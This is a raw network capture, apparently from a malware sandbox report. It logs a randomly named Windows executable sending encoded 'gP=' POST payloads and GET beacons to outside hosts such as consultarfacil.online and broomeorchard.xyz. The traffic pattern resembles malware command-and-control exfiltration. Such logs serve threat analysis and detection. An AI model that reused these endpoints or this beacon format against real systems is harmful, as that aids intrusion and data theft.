                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      29 | 192.168.2.11 | 50010 | 3.33.130.190 | 80 | 3000 | C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Oct 8, 2024 15:56:56.568715096 CEST | 751 | OUT | POST /2ho9/ HTTP/1.1
                                                                                                      Host: www.consultarfacil.online
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Language: en-US
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Content-Length: 199
                                                                                                      Origin: http://www.consultarfacil.online
                                                                                                      Referer: http://www.consultarfacil.online/2ho9/
                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                                                                      Data Raw: 67 50 3d 68 62 72 49 68 52 55 6e 4b 58 70 46 47 39 73 50 4c 54 63 62 52 65 43 52 79 6d 37 37 70 51 30 65 33 79 2b 6e 6e 4f 37 5a 6f 75 63 70 42 75 69 68 32 53 36 5a 56 77 4c 32 6a 54 30 6c 65 5a 2b 76 4f 33 37 36 62 6e 44 50 34 77 68 6d 62 4b 32 2f 7a 35 37 4c 44 61 61 79 4a 61 78 62 48 66 67 61 67 76 6d 38 4a 77 61 67 77 55 34 36 67 61 31 73 64 68 63 38 7a 36 62 7a 59 4c 47 39 74 33 6a 41 51 64 56 46 31 6d 44 75 7a 62 4c 72 45 61 71 41 74 6d 4a 64 77 75 4d 39 6e 49 64 6b 33 56 4c 6d 33 6f 39 38 30 7a 47 70 36 76 78 75 38 4a 72 62 48 4f 76 62 4f 41 49 53 6f 74 59 68 64 45 51 49 2b 67 3d 3d
                                                                                                      Data Ascii: gP=hbrIhRUnKXpFG9sPLTcbReCRym77pQ0e3y+nnO7ZoucpBuih2S6ZVwL2jT0leZ+vO376bnDP4whmbK2/z57LDaayJaxbHfgagvm8JwagwU46ga1sdhc8z6bzYLG9t3jAQdVF1mDuzbLrEaqAtmJdwuM9nIdk3VLm3o980zGp6vxu8JrbHOvbOAISotYhdEQI+g==


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      30 | 192.168.2.11 | 50011 | 3.33.130.190 | 80 | 3000 | C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Oct 8, 2024 15:56:59.118426085 CEST | 771 | OUT | POST /2ho9/ HTTP/1.1
                                                                                                      Host: www.consultarfacil.online
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Language: en-US
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Content-Length: 219
                                                                                                      Origin: http://www.consultarfacil.online
                                                                                                      Referer: http://www.consultarfacil.online/2ho9/
                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                                                                      Data Raw: 67 50 3d 68 62 72 49 68 52 55 6e 4b 58 70 46 48 64 63 50 4b 30 49 62 58 2b 43 4f 75 57 37 37 67 77 30 61 33 79 69 6e 6e 4c 62 4a 72 61 77 70 42 50 53 68 6b 54 36 5a 55 77 4c 32 6b 6a 30 6b 42 4a 2b 6d 4f 33 6d 4a 62 6a 4c 50 34 77 31 6d 62 4b 47 2f 7a 71 6a 49 44 4b 61 4b 42 36 78 46 4b 2f 67 61 67 76 6d 38 4a 30 32 47 77 55 77 36 68 71 6c 73 63 46 77 2f 2b 61 62 30 51 72 47 39 6d 58 69 4c 51 64 55 69 31 69 69 44 7a 5a 44 72 45 59 43 41 74 33 4a 53 6e 2b 4d 37 70 6f 63 68 6d 6d 32 6a 35 2f 38 6f 73 69 79 49 74 72 38 4b 39 50 36 42 58 74 6d 4d 4e 54 41 51 38 4c 35 52 55 31 31 42 6c 68 59 33 2f 2f 72 78 58 44 6d 4f 57 53 63 35 75 77 67 35 5a 4e 49 3d
                                                                                                      Data Ascii: gP=hbrIhRUnKXpFHdcPK0IbX+COuW77gw0a3yinnLbJrawpBPShkT6ZUwL2kj0kBJ+mO3mJbjLP4w1mbKG/zqjIDKaKB6xFK/gagvm8J02GwUw6hqlscFw/+ab0QrG9mXiLQdUi1iiDzZDrEYCAt3JSn+M7pochmm2j5/8osiyItr8K9P6BXtmMNTAQ8L5RU11BlhY3//rxXDmOWSc5uwg5ZNI=


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      31 | 192.168.2.11 | 50012 | 3.33.130.190 | 80 | 3000 | C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Oct 8, 2024 15:57:01.773335934 CEST | 1784 | OUT | POST /2ho9/ HTTP/1.1
                                                                                                      Host: www.consultarfacil.online
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Language: en-US
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Content-Length: 1231
                                                                                                      Origin: http://www.consultarfacil.online
                                                                                                      Referer: http://www.consultarfacil.online/2ho9/
                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                                                                      Data Raw: 67 50 3d 68 62 72 49 68 52 55 6e 4b 58 70 46 48 64 63 50 4b 30 49 62 58 2b 43 4f 75 57 37 37 67 77 30 61 33 79 69 6e 6e 4c 62 4a 72 62 6b 70 42 38 61 68 6e 77 53 5a 4f 77 4c 32 72 7a 30 70 42 4a 2f 30 4f 33 2b 57 62 6a 48 31 34 7a 4e 6d 62 72 6d 2f 6e 50 58 49 49 4b 61 4b 65 71 78 59 48 66 67 31 67 72 4c 33 4a 77 57 47 77 55 77 36 68 73 5a 73 49 68 63 2f 38 61 62 7a 59 4c 47 35 74 33 69 6a 51 64 4e 64 31 6a 6a 2b 79 70 6a 72 46 34 53 41 73 46 68 53 6b 65 4d 35 75 6f 63 48 6d 6d 36 6f 35 2f 49 6b 73 69 48 56 74 73 34 4b 39 72 48 57 4d 65 62 57 59 41 77 38 70 4e 68 78 59 6d 46 2f 70 69 63 32 2f 61 6a 4d 4a 45 71 55 62 33 6c 4b 34 30 63 52 61 70 70 67 31 50 79 73 31 42 66 33 34 45 62 37 75 66 78 39 50 54 55 39 44 39 54 36 57 72 63 61 74 42 71 71 4a 35 6e 42 4f 54 57 63 4f 55 61 78 39 4d 37 5a 70 69 4c 41 39 69 79 38 6f 42 34 55 73 76 67 43 74 62 4d 56 62 6f 46 4a 48 32 4a 6a 34 5a 70 2f 45 73 46 79 6b 49 76 64 35 77 2f 77 33 65 5a 2f 4e 30 56 67 47 68 51 7a 38 36 68 2b 53 4b 46 77 38 35 49 7a 50 65 6d [TRUNCATED]
                                                                                                      Data Ascii: gP=hbrIhRUnKXpFHdcPK0IbX+COuW77gw0a3yinnLbJrbkpB8ahnwSZOwL2rz0pBJ/0O3+WbjH14zNmbrm/nPXIIKaKeqxYHfg1grL3JwWGwUw6hsZsIhc/8abzYLG5t3ijQdNd1jj+ypjrF4SAsFhSkeM5uocHmm6o5/IksiHVts4K9rHWMebWYAw8pNhxYmF/pic2/ajMJEqUb3lK40cRappg1Pys1Bf34Eb7ufx9PTU9D9T6WrcatBqqJ5nBOTWcOUax9M7ZpiLA9iy8oB4UsvgCtbMVboFJH2Jj4Zp/EsFykIvd5w/w3eZ/N0VgGhQz86h+SKFw85IzPemYnS9j1bgLNqr4o4Gni3QeOxHZQQPWIEHcb8z/vk0Yi7JdbdqKqpK2LSjqKFbHDHCuYHefg6oRAVx4ZYwk5AHq1IQGqVWiUC5cp8m/niwk66Ty9ccnww/enaIXlthMPe9LZDvm3fBE/GFrzzaTvXhkrJ1o/PyKIG8QQ3X1cuSx9kDgLZjXKynVaNmCTA+plWe9zTmJ8npVDId+QEpHqIFG9aIIOCq5pYEDw4IqED35ajO5E2Exlq1oUh1DHRmgtmOwMj9h92JKd1OM1wxKCVwz20MnRVlrEynMuDWBFYggz1boMTFJ+rUBxbH6RA8T1tG09b0qm7CY6W6vorALDrFmtsxNRdKZLvao+keX45pa6Pa+feQybYWWA24lVn9OfsfG8dj3JpOTEeCfOzFPAjFZ1u664w9fcVQRBBfS8gk9My2VQkHMeBhd68qo480j5u15StpsX1OSkvQ/rSZM9XUjkrweFk49DbqJBW8yAKO6gTp2Lg1cw3JCNrIIDeGbYfUuaLPpxwn6Qok2s/Oc89EOzAyR+Zs+avtqnArSPdSt5WyQUNImFlvrQabFrSpZNpmL4AwT/j2YCQy2ZjqRSG/lCUKdKbV1ue49xCqwkceUZxpTTUN140BEoRNV9eXPU02/mSYzwPRBMNXEcEDGKmu4VFi3qpCQZz2+t [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.11 | 50013 | 3.33.130.190 | 80 | 3000 | C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:57:04.336757898 CEST | 469 | OUT | GET /2ho9/?gP=sZDoihg8ajsFNu4sFB4wVMG24nWUkQUSxybOs53co7FoCsqulhCNIl7qmx9+CpDfKiL3BRrx3kpFS5y+tLS3H5WrA65sHfIkn+XzJEmDgF1B4fp1cD4x67M=&-L=kBMxZFRpAD6P HTTP/1.1
                                                                                                      Host: www.consultarfacil.online
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Language: en-US
                                                                                                      Connection: close
                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
Oct 8, 2024 15:57:04.970952034 CEST | 394 | IN | HTTP/1.1 200 OK
                                                                                                      Server: openresty
                                                                                                      Date: Tue, 08 Oct 2024 13:57:04 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 254
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 67 50 3d 73 5a 44 6f 69 68 67 38 61 6a 73 46 4e 75 34 73 46 42 34 77 56 4d 47 32 34 6e 57 55 6b 51 55 53 78 79 62 4f 73 35 33 63 6f 37 46 6f 43 73 71 75 6c 68 43 4e 49 6c 37 71 6d 78 39 2b 43 70 44 66 4b 69 4c 33 42 52 72 78 33 6b 70 46 53 35 79 2b 74 4c 53 33 48 35 57 72 41 36 35 73 48 66 49 6b 6e 2b 58 7a 4a 45 6d 44 67 46 31 42 34 66 70 31 63 44 34 78 36 37 4d 3d 26 2d 4c 3d 6b 42 4d 78 5a 46 52 70 41 44 36 50 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?gP=sZDoihg8ajsFNu4sFB4wVMG24nWUkQUSxybOs53co7FoCsqulhCNIl7qmx9+CpDfKiL3BRrx3kpFS5y+tLS3H5WrA65sHfIkn+XzJEmDgF1B4fp1cD4x67M=&-L=kBMxZFRpAD6P"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.11 | 50014 | 15.197.204.56 | 80 | 3000 | C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:57:10.045954943 CEST | 739 | OUT | POST /8o1o/ HTTP/1.1
                                                                                                      Host: www.broomeorchard.xyz
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Language: en-US
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Content-Length: 199
                                                                                                      Origin: http://www.broomeorchard.xyz
                                                                                                      Referer: http://www.broomeorchard.xyz/8o1o/
                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                                                                      Data Raw: 67 50 3d 64 73 50 42 57 52 7a 48 47 58 68 74 44 69 53 50 67 43 76 43 70 6b 35 50 41 55 57 6c 5a 58 4e 54 38 78 43 61 4b 78 33 76 37 6c 44 45 77 52 65 41 68 78 36 2b 41 59 4b 6b 37 58 76 7a 74 42 32 68 46 49 75 55 66 34 49 6f 36 50 6d 61 44 70 5a 49 6c 49 71 34 55 49 30 51 2f 46 30 34 71 4f 31 59 32 4f 4c 69 71 72 63 56 61 79 44 33 4d 6b 62 33 68 4b 45 36 4d 47 51 68 54 45 54 70 6f 4c 55 6f 39 65 39 49 6f 4a 49 46 71 53 45 6b 66 56 4c 48 39 50 4f 76 72 71 6b 49 4e 4e 38 4f 73 44 4b 46 78 58 61 6e 42 46 59 68 48 35 33 5a 57 33 4a 4b 35 70 66 49 64 62 70 41 50 69 37 58 79 6f 48 43 4a 41 3d 3d
                                                                                                      Data Ascii: gP=dsPBWRzHGXhtDiSPgCvCpk5PAUWlZXNT8xCaKx3v7lDEwReAhx6+AYKk7XvztB2hFIuUf4Io6PmaDpZIlIq4UI0Q/F04qO1Y2OLiqrcVayD3Mkb3hKE6MGQhTETpoLUo9e9IoJIFqSEkfVLH9POvrqkINN8OsDKFxXanBFYhH53ZW3JK5pfIdbpAPi7XyoHCJA==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.11 | 50015 | 15.197.204.56 | 80 | 3000 | C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:57:12.592758894 CEST | 759 | OUT | POST /8o1o/ HTTP/1.1
                                                                                                      Host: www.broomeorchard.xyz
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Language: en-US
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Content-Length: 219
                                                                                                      Origin: http://www.broomeorchard.xyz
                                                                                                      Referer: http://www.broomeorchard.xyz/8o1o/
                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                                                                      Data Raw: 67 50 3d 64 73 50 42 57 52 7a 48 47 58 68 74 42 42 61 50 69 68 48 43 68 6b 35 49 64 6b 57 6c 53 33 4e 50 38 78 2b 61 4b 77 43 79 37 57 33 45 78 30 69 41 6d 30 4f 2b 44 59 4b 6b 7a 33 75 34 6a 68 32 2b 46 49 69 36 66 39 77 6f 36 50 79 61 44 6f 4a 49 6b 37 43 37 57 59 30 57 35 46 30 2b 75 4f 31 59 32 4f 4c 69 71 76 39 43 61 79 4c 33 4d 77 6e 33 68 76 6b 39 42 6d 51 2b 51 45 54 70 73 4c 55 73 39 65 39 36 6f 4e 4a 6f 71 58 41 6b 66 56 37 48 7a 2b 4f 73 79 61 6b 43 44 74 39 41 73 51 33 5a 77 48 61 6e 4a 45 38 31 45 59 32 2b 58 78 59 51 70 4b 57 66 65 49 68 43 62 45 61 6e 37 5a 69 4c 53 41 42 55 72 37 64 62 51 50 63 2b 6e 4e 48 78 69 53 5a 45 79 78 49 3d
                                                                                                      Data Ascii: gP=dsPBWRzHGXhtBBaPihHChk5IdkWlS3NP8x+aKwCy7W3Ex0iAm0O+DYKkz3u4jh2+FIi6f9wo6PyaDoJIk7C7WY0W5F0+uO1Y2OLiqv9CayL3Mwn3hvk9BmQ+QETpsLUs9e96oNJoqXAkfV7Hz+OsyakCDt9AsQ3ZwHanJE81EY2+XxYQpKWfeIhCbEan7ZiLSABUr7dbQPc+nNHxiSZEyxI=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.11 | 50016 | 15.197.204.56 | 80 | 3000 | C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:57:15.131545067 CEST | 1772 | OUT | POST /8o1o/ HTTP/1.1
                                                                                                      Host: www.broomeorchard.xyz
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Language: en-US
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Content-Length: 1231
                                                                                                      Origin: http://www.broomeorchard.xyz
                                                                                                      Referer: http://www.broomeorchard.xyz/8o1o/
                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                                                                      Data Raw: 67 50 3d 64 73 50 42 57 52 7a 48 47 58 68 74 42 42 61 50 69 68 48 43 68 6b 35 49 64 6b 57 6c 53 33 4e 50 38 78 2b 61 4b 77 43 79 37 57 76 45 77 47 61 41 6d 54 53 2b 43 59 4b 6b 35 58 75 37 6a 68 32 33 46 49 36 2b 66 39 30 65 36 4a 32 61 41 50 4a 49 78 36 43 37 63 59 30 57 30 6c 30 2f 71 4f 30 46 32 50 37 63 71 72 5a 43 61 79 4c 33 4d 78 33 33 31 71 45 39 44 6d 51 68 54 45 54 75 6f 4c 56 37 39 65 46 51 6f 4e 4d 56 71 44 30 6b 52 56 72 48 78 49 61 73 37 61 6b 45 45 74 38 64 73 51 37 77 77 48 48 63 4a 45 49 54 45 59 4f 2b 55 30 74 78 75 71 53 57 66 62 56 64 62 48 43 41 77 36 61 58 56 54 31 72 36 4c 78 75 47 2f 59 30 72 34 4f 4e 2b 6a 56 52 6b 6c 50 6d 62 63 48 6f 38 57 36 73 44 67 41 77 2f 6f 6e 35 63 39 4d 63 67 36 31 53 74 55 56 39 59 6f 39 46 68 63 74 43 6f 63 79 68 38 2b 78 36 48 38 30 54 42 50 35 31 49 6c 2b 61 4f 71 6d 68 7a 52 76 4b 77 52 43 35 6d 33 4e 54 50 6e 78 37 72 44 4d 32 73 75 79 59 54 6a 79 6b 4c 52 44 6b 50 75 34 31 4e 6b 4b 53 6b 35 4e 30 74 56 47 4a 63 52 30 72 68 61 61 59 63 31 4a [TRUNCATED]
                                                                                                      Data Ascii: gP=dsPBWRzHGXhtBBaPihHChk5IdkWlS3NP8x+aKwCy7WvEwGaAmTS+CYKk5Xu7jh23FI6+f90e6J2aAPJIx6C7cY0W0l0/qO0F2P7cqrZCayL3Mx331qE9DmQhTETuoLV79eFQoNMVqD0kRVrHxIas7akEEt8dsQ7wwHHcJEITEYO+U0txuqSWfbVdbHCAw6aXVT1r6LxuG/Y0r4ON+jVRklPmbcHo8W6sDgAw/on5c9Mcg61StUV9Yo9FhctCocyh8+x6H80TBP51Il+aOqmhzRvKwRC5m3NTPnx7rDM2suyYTjykLRDkPu41NkKSk5N0tVGJcR0rhaaYc1Jxykn34hRHY6o/aeGQ4V1gvVf45CgiIqcKvKMW9r55E1n1fLYVIzT2GrcvGVUNcB2bq3k2Gx8CvOrON2tZQkMIqGqdyCGA2Rv+euW/1SZdj9APcBn3CoZAbnwXk3Qm9YABAejEdJVBsjy0QSiawkWn8DONYLMBKqxoF2CqYzGL5ombXH+H+nkAgJGyUjhSasyc6M0gDzxTnCj7knccpL0GA+JwgLBx6ZKVWncbeMCoTn2stbSCcRF3OkpMx/KF+6g/XrZ3W+IkZakUBfjfprLh22WQnl7+QlMnqUREDYZoDTr8t02uYVJOXJWnXopa3zY/HX9LdmSC4vyW6uQsMXt+TC5ZuRW/sQ4VNtJwjsbcnn1EX4MAlzk77i1v/DTF/zAtJquuhwXKPwulLvelDUTen7lm8u/qPmR0qHB+IQ8t1o2pMM7fe1k9ppUtn//f0ShxVqKIVOnNvAAQschThf5oA7vELYrTsv7YcDHCEvMeMBCreRKPgp90FhLkpTyHz5gIU9EHlCtHm+Q0EQ//J0LDTpNeP18I8wCFFQUBxQAZgzBGsvu7p0PA3b39N+Qk/MXinIZSogYA/xBq8FDivbeAhBZMDbu9J8xfK6BwTrl90ZnAvTTHuc028ExhJoBO9EW6aZa+ThT5vZ5zT9S0Q1GLKITd+/fq4udmg [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.11 | 50017 | 15.197.204.56 | 80 | 3000 | C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:57:17.676268101 CEST | 465 | OUT | GET /8o1o/?-L=kBMxZFRpAD6P&gP=QunhVm6kZFQCJjGkuC7lsmN7UDLhVH5unS34CwGNyhG42F+U2Qq2Bbej6HS9mh+MEeKFfLAj85iyVJ5CsJDjT9kB1XQFiuYG2+iOt7QfZQyJLxqfhY4aAGU= HTTP/1.1
                                                                                                      Host: www.broomeorchard.xyz
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Language: en-US
                                                                                                      Connection: close
                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
Oct 8, 2024 15:57:18.136419058 CEST | 394 | IN | HTTP/1.1 200 OK
                                                                                                      Server: openresty
                                                                                                      Date: Tue, 08 Oct 2024 13:57:18 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 254
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 2d 4c 3d 6b 42 4d 78 5a 46 52 70 41 44 36 50 26 67 50 3d 51 75 6e 68 56 6d 36 6b 5a 46 51 43 4a 6a 47 6b 75 43 37 6c 73 6d 4e 37 55 44 4c 68 56 48 35 75 6e 53 33 34 43 77 47 4e 79 68 47 34 32 46 2b 55 32 51 71 32 42 62 65 6a 36 48 53 39 6d 68 2b 4d 45 65 4b 46 66 4c 41 6a 38 35 69 79 56 4a 35 43 73 4a 44 6a 54 39 6b 42 31 58 51 46 69 75 59 47 32 2b 69 4f 74 37 51 66 5a 51 79 4a 4c 78 71 66 68 59 34 61 41 47 55 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?-L=kBMxZFRpAD6P&gP=QunhVm6kZFQCJjGkuC7lsmN7UDLhVH5unS34CwGNyhG42F+U2Qq2Bbej6HS9mh+MEeKFfLAj85iyVJ5CsJDjT9kB1XQFiuYG2+iOt7QfZQyJLxqfhY4aAGU="}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.11 | 50018 | 198.252.106.191 | 80 | 3000 | C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:57:23.207777023 CEST | 733 | OUT | POST /4est/ HTTP/1.1
                                                                                                      Host: www.suarahati20.xyz
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Language: en-US
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Content-Length: 199
                                                                                                      Origin: http://www.suarahati20.xyz
                                                                                                      Referer: http://www.suarahati20.xyz/4est/
                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                                                                      Data Raw: 67 50 3d 33 52 4b 49 4e 38 72 75 4b 58 69 59 52 65 44 38 59 31 44 58 33 63 41 4e 48 6a 51 77 76 44 73 58 58 77 4f 48 4b 68 50 64 42 36 54 61 51 6b 4b 64 70 67 61 63 32 65 72 7a 44 47 43 53 4a 59 54 4a 59 4e 4e 31 6c 4b 31 63 45 6c 46 53 44 32 78 6f 54 4f 4a 54 6c 71 73 33 45 31 33 39 75 35 64 70 35 65 6c 6f 59 41 58 6b 76 33 6e 63 34 6f 75 4b 45 74 52 36 56 2b 4b 61 72 36 32 31 2f 46 4e 6b 4d 45 79 30 58 69 54 71 79 4e 6a 64 47 31 6a 64 70 65 4b 39 72 6f 6c 73 47 4b 32 62 67 37 65 59 6a 74 79 75 64 4d 4b 5a 34 53 36 42 38 55 74 4b 58 69 4f 65 32 6f 30 63 53 55 51 4f 37 50 52 54 7a 77 3d 3d
                                                                                                      Data Ascii: gP=3RKIN8ruKXiYReD8Y1DX3cANHjQwvDsXXwOHKhPdB6TaQkKdpgac2erzDGCSJYTJYNN1lK1cElFSD2xoTOJTlqs3E139u5dp5eloYAXkv3nc4ouKEtR6V+Kar621/FNkMEy0XiTqyNjdG1jdpeK9rolsGK2bg7eYjtyudMKZ4S6B8UtKXiOe2o0cSUQO7PRTzw==
Oct 8, 2024 15:57:23.791959047 CEST | 1033 | IN | HTTP/1.1 404 Not Found
                                                                                                      Connection: close
                                                                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                      pragma: no-cache
                                                                                                      content-type: text/html
                                                                                                      content-length: 796
                                                                                                      date: Tue, 08 Oct 2024 13:57:23 GMT
                                                                                                      server: LiteSpeed
